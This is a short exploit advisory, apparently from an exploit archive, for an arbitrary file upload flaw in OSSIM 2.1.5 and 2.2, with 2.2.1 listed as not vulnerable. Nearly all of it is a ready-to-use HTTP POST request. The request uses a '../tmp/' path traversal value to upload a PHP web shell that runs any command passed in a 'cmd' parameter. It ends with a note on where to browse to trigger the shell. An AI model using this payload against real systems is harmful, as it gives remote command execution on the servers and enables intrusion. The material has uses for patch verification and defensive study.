OSSIM (repository_attachment.php) Arbitrary File Upload Vuln
Posted on 18 March 2010
===================================================================== OSSIM (repository_attachment.php) Arbitrary File Upload Vulnerability ===================================================================== Vulnerable: OSSIM os-sim 2.1.5 OSSIM os-sim 2.2 Not Vulnerable: OSSIM os-sim 2.2.1 POST /ossim/repository/repository_attachment.php HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Cookie: PHPSESSID=(YOUR_COOKIE_HERE) Content-Type: multipart/form-data; boundary=--------------------------- 11440981608429693121899471469 Content-Length: 689 -----------------------------11440981608429693121899471469 Content-Disposition: form-data; name="id_document" ../tmp/ -----------------------------11440981608429693121899471469 Content-Disposition: form-data; name="atchfile"; filename="R4nd0mF1l31tdoesntmatter.php" Content-Type: text/vnd.wap.wml <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML> -----------------------------11440981608429693121899471469-- and then, browse /ossiminstall/tmp/_(DOC_ID).php # ~ - [ [ : Inj3ct0r : ] ]
